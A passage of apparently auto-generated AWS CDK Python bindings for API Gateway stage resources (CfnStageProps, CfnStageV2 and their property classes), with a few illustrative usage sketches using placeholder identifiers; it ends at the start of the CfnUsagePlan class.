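# MethodSettingProperty that enables CloudWatch metrics and INFO-level logging
# for every method on every resource path. All values below are hypothetical.
def _example_method_setting() -> "CfnStage.MethodSettingProperty":
    return CfnStage.MethodSettingProperty(
        http_method="*",              # apply to all HTTP methods
        resource_path="/*",           # apply to all resource paths
        metrics_enabled=True,
        logging_level="INFO",
        throttling_burst_limit=200,   # maximum request burst
        throttling_rate_limit=100,    # steady-state requests per second
    )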
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'access_log_setting': 'accessLogSetting', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'canary_setting': 'canarySetting', 'client_certificate_id': 'clientCertificateId', 'deployment_id': 'deploymentId', 'description': 'description', 'documentation_version': 'documentationVersion', 'method_settings': 'methodSettings', 'stage_name': 'stageName', 'tags': 'tags', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables'})
class CfnStageProps():
def __init__(self, *, rest_api_id: str, access_log_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.AccessLogSettingProperty"]]]=None, cache_cluster_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_cluster_size: typing.Optional[str]=None, canary_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.CanarySettingProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, deployment_id: typing.Optional[str]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, method_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnStage.MethodSettingProperty"]]]]]=None, stage_name: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, tracing_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, variables: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None):
"""Properties for defining a ``AWS::ApiGateway::Stage``.
:param rest_api_id: ``AWS::ApiGateway::Stage.RestApiId``.
:param access_log_setting: ``AWS::ApiGateway::Stage.AccessLogSetting``.
:param cache_cluster_enabled: ``AWS::ApiGateway::Stage.CacheClusterEnabled``.
:param cache_cluster_size: ``AWS::ApiGateway::Stage.CacheClusterSize``.
:param canary_setting: ``AWS::ApiGateway::Stage.CanarySetting``.
:param client_certificate_id: ``AWS::ApiGateway::Stage.ClientCertificateId``.
:param deployment_id: ``AWS::ApiGateway::Stage.DeploymentId``.
:param description: ``AWS::ApiGateway::Stage.Description``.
:param documentation_version: ``AWS::ApiGateway::Stage.DocumentationVersion``.
:param method_settings: ``AWS::ApiGateway::Stage.MethodSettings``.
:param stage_name: ``AWS::ApiGateway::Stage.StageName``.
:param tags: ``AWS::ApiGateway::Stage.Tags``.
:param tracing_enabled: ``AWS::ApiGateway::Stage.TracingEnabled``.
:param variables: ``AWS::ApiGateway::Stage.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if access_log_setting is not None: self._values["access_log_setting"] = access_log_setting
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if canary_setting is not None: self._values["canary_setting"] = canary_setting
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if deployment_id is not None: self._values["deployment_id"] = deployment_id
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if method_settings is not None: self._values["method_settings"] = method_settings
if stage_name is not None: self._values["stage_name"] = stage_name
if tags is not None: self._values["tags"] = tags
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Stage.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-restapiid
"""
return self._values.get('rest_api_id')
@property
def access_log_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.AccessLogSettingProperty"]]]:
"""``AWS::ApiGateway::Stage.AccessLogSetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-accesslogsetting
"""
return self._values.get('access_log_setting')
@property
def cache_cluster_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.CacheClusterEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclusterenabled
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.CacheClusterSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-cacheclustersize
"""
return self._values.get('cache_cluster_size')
@property
def canary_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStage.CanarySettingProperty"]]]:
"""``AWS::ApiGateway::Stage.CanarySetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-canarysetting
"""
return self._values.get('canary_setting')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-clientcertificateid
"""
return self._values.get('client_certificate_id')
@property
def deployment_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-deploymentid
"""
return self._values.get('deployment_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-description
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-documentationversion
"""
return self._values.get('documentation_version')
@property
def method_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnStage.MethodSettingProperty"]]]]]:
"""``AWS::ApiGateway::Stage.MethodSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-methodsettings
"""
return self._values.get('method_settings')
@property
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-stagename
"""
return self._values.get('stage_name')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tags
"""
return self._values.get('tags')
@property
def tracing_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Stage.TracingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-tracingenabled
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Stage.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-stage.html#cfn-apigateway-stage-variables
"""
return self._values.get('variables')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnStageProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
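# Illustrative usage sketch: assembling CfnStageProps for a cached, traced
# stage. ``rest_api_id`` and ``deployment_id`` are hypothetical placeholders
# for identifiers produced elsewhere in a CDK app.
def _example_stage_props() -> "CfnStageProps":
    return CfnStageProps(
        rest_api_id="abcdef1234",     # the only required property
        deployment_id="dep12345",
        stage_name="prod",
        cache_cluster_enabled=True,
        cache_cluster_size="0.5",     # one of the cache sizes (in GB) API Gateway accepts
        tracing_enabled=True,         # enable AWS X-Ray tracing
        variables={"env": "production"},
    )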
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStageV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnStageV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Stage
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, deployment_id: str, stage_name: str, access_log_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingsProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, default_route_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["RouteSettingsProperty"]]]=None, description: typing.Optional[str]=None, route_settings: typing.Any=None, stage_variables: typing.Any=None, tags: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Stage``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_id: ``AWS::ApiGatewayV2::Stage.ApiId``.
:param deployment_id: ``AWS::ApiGatewayV2::Stage.DeploymentId``.
:param stage_name: ``AWS::ApiGatewayV2::Stage.StageName``.
:param access_log_settings: ``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
:param client_certificate_id: ``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
:param default_route_settings: ``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
:param description: ``AWS::ApiGatewayV2::Stage.Description``.
:param route_settings: ``AWS::ApiGatewayV2::Stage.RouteSettings``.
:param stage_variables: ``AWS::ApiGatewayV2::Stage.StageVariables``.
:param tags: ``AWS::ApiGatewayV2::Stage.Tags``.
"""
props = CfnStageV2Props(api_id=api_id, deployment_id=deployment_id, stage_name=stage_name, access_log_settings=access_log_settings, client_certificate_id=client_certificate_id, default_route_settings=default_route_settings, description=description, route_settings=route_settings, stage_variables=stage_variables, tags=tags)
jsii.create(CfnStageV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGatewayV2::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="deploymentId")
def deployment_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-deploymentid
"""
return jsii.get(self, "deploymentId")
@deployment_id.setter
def deployment_id(self, value: str):
return jsii.set(self, "deploymentId", value)
@property
@jsii.member(jsii_name="routeSettings")
def route_settings(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.RouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-routesettings
"""
return jsii.get(self, "routeSettings")
@route_settings.setter
def route_settings(self, value: typing.Any):
return jsii.set(self, "routeSettings", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> str:
"""``AWS::ApiGatewayV2::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: str):
return jsii.set(self, "stageName", value)
@property
@jsii.member(jsii_name="stageVariables")
def stage_variables(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.StageVariables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagevariables
"""
return jsii.get(self, "stageVariables")
@stage_variables.setter
def stage_variables(self, value: typing.Any):
return jsii.set(self, "stageVariables", value)
@property
@jsii.member(jsii_name="accessLogSettings")
def access_log_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-accesslogsettings
"""
return jsii.get(self, "accessLogSettings")
@access_log_settings.setter
def access_log_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["AccessLogSettingsProperty"]]]):
return jsii.set(self, "accessLogSettings", value)
@property
@jsii.member(jsii_name="clientCertificateId")
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-clientcertificateid
"""
return jsii.get(self, "clientCertificateId")
@client_certificate_id.setter
def client_certificate_id(self, value: typing.Optional[str]):
return jsii.set(self, "clientCertificateId", value)
@property
@jsii.member(jsii_name="defaultRouteSettings")
def default_route_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["RouteSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-defaultroutesettings
"""
return jsii.get(self, "defaultRouteSettings")
@default_route_settings.setter
def default_route_settings(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["RouteSettingsProperty"]]]):
return jsii.set(self, "defaultRouteSettings", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageV2.AccessLogSettingsProperty", jsii_struct_bases=[], name_mapping={'destination_arn': 'destinationArn', 'format': 'format'})
class AccessLogSettingsProperty():
def __init__(self, *, destination_arn: typing.Optional[str]=None, format: typing.Optional[str]=None):
"""
:param destination_arn: ``CfnStageV2.AccessLogSettingsProperty.DestinationArn``.
:param format: ``CfnStageV2.AccessLogSettingsProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-accesslogsettings.html
"""
self._values = {
}
if destination_arn is not None: self._values["destination_arn"] = destination_arn
if format is not None: self._values["format"] = format
@property
def destination_arn(self) -> typing.Optional[str]:
"""``CfnStageV2.AccessLogSettingsProperty.DestinationArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-accesslogsettings.html#cfn-apigatewayv2-stage-accesslogsettings-destinationarn
"""
return self._values.get('destination_arn')
@property
def format(self) -> typing.Optional[str]:
"""``CfnStageV2.AccessLogSettingsProperty.Format``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-accesslogsettings.html#cfn-apigatewayv2-stage-accesslogsettings-format
"""
return self._values.get('format')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'AccessLogSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageV2.RouteSettingsProperty", jsii_struct_bases=[], name_mapping={'data_trace_enabled': 'dataTraceEnabled', 'detailed_metrics_enabled': 'detailedMetricsEnabled', 'logging_level': 'loggingLevel', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class RouteSettingsProperty():
def __init__(self, *, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, detailed_metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, logging_level: typing.Optional[str]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param data_trace_enabled: ``CfnStageV2.RouteSettingsProperty.DataTraceEnabled``.
:param detailed_metrics_enabled: ``CfnStageV2.RouteSettingsProperty.DetailedMetricsEnabled``.
:param logging_level: ``CfnStageV2.RouteSettingsProperty.LoggingLevel``.
:param throttling_burst_limit: ``CfnStageV2.RouteSettingsProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnStageV2.RouteSettingsProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html
"""
self._values = {
}
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if detailed_metrics_enabled is not None: self._values["detailed_metrics_enabled"] = detailed_metrics_enabled
if logging_level is not None: self._values["logging_level"] = logging_level
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStageV2.RouteSettingsProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def detailed_metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnStageV2.RouteSettingsProperty.DetailedMetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-detailedmetricsenabled
"""
return self._values.get('detailed_metrics_enabled')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnStageV2.RouteSettingsProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-logginglevel
"""
return self._values.get('logging_level')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStageV2.RouteSettingsProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnStageV2.RouteSettingsProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-stage-routesettings.html#cfn-apigatewayv2-stage-routesettings-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RouteSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
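# Illustrative usage sketch: defining an ``AWS::ApiGatewayV2::Stage`` with
# default route settings and JSON access logging. ``scope`` must be an
# existing construct (for example an aws_cdk.core.Stack); the ids and the
# log-group ARN are hypothetical placeholders.
def _example_stage_v2(scope: aws_cdk.core.Construct) -> "CfnStageV2":
    return CfnStageV2(
        scope, "ExampleStageV2",
        api_id="api12345",
        deployment_id="dep12345",
        stage_name="prod",
        default_route_settings=CfnStageV2.RouteSettingsProperty(
            detailed_metrics_enabled=True,
            throttling_burst_limit=200,
            throttling_rate_limit=100,
        ),
        access_log_settings=CfnStageV2.AccessLogSettingsProperty(
            destination_arn="arn:aws:logs:us-east-1:111122223333:log-group:example",
            format='{"requestId": "$context.requestId", "status": "$context.status"}',
        ),
    )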
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnStageV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'deployment_id': 'deploymentId', 'stage_name': 'stageName', 'access_log_settings': 'accessLogSettings', 'client_certificate_id': 'clientCertificateId', 'default_route_settings': 'defaultRouteSettings', 'description': 'description', 'route_settings': 'routeSettings', 'stage_variables': 'stageVariables', 'tags': 'tags'})
class CfnStageV2Props():
def __init__(self, *, api_id: str, deployment_id: str, stage_name: str, access_log_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.AccessLogSettingsProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, default_route_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.RouteSettingsProperty"]]]=None, description: typing.Optional[str]=None, route_settings: typing.Any=None, stage_variables: typing.Any=None, tags: typing.Any=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Stage``.
:param api_id: ``AWS::ApiGatewayV2::Stage.ApiId``.
:param deployment_id: ``AWS::ApiGatewayV2::Stage.DeploymentId``.
:param stage_name: ``AWS::ApiGatewayV2::Stage.StageName``.
:param access_log_settings: ``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
:param client_certificate_id: ``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
:param default_route_settings: ``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
:param description: ``AWS::ApiGatewayV2::Stage.Description``.
:param route_settings: ``AWS::ApiGatewayV2::Stage.RouteSettings``.
:param stage_variables: ``AWS::ApiGatewayV2::Stage.StageVariables``.
:param tags: ``AWS::ApiGatewayV2::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html
"""
self._values = {
'api_id': api_id,
'deployment_id': deployment_id,
'stage_name': stage_name,
}
if access_log_settings is not None: self._values["access_log_settings"] = access_log_settings
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if default_route_settings is not None: self._values["default_route_settings"] = default_route_settings
if description is not None: self._values["description"] = description
if route_settings is not None: self._values["route_settings"] = route_settings
if stage_variables is not None: self._values["stage_variables"] = stage_variables
if tags is not None: self._values["tags"] = tags
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-apiid
"""
return self._values.get('api_id')
@property
def deployment_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-deploymentid
"""
return self._values.get('deployment_id')
@property
def stage_name(self) -> str:
"""``AWS::ApiGatewayV2::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagename
"""
return self._values.get('stage_name')
@property
def access_log_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.AccessLogSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-accesslogsettings
"""
return self._values.get('access_log_settings')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-clientcertificateid
"""
return self._values.get('client_certificate_id')
@property
def default_route_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.RouteSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-defaultroutesettings
"""
return self._values.get('default_route_settings')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-description
"""
return self._values.get('description')
@property
def route_settings(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.RouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-routesettings
"""
return self._values.get('route_settings')
@property
def stage_variables(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.StageVariables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagevariables
"""
return self._values.get('stage_variables')
@property
def tags(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnStageV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnUsagePlan(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan"):
"""A CloudFormation ``AWS::ApiGateway::UsagePlan``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::UsagePlan
"""
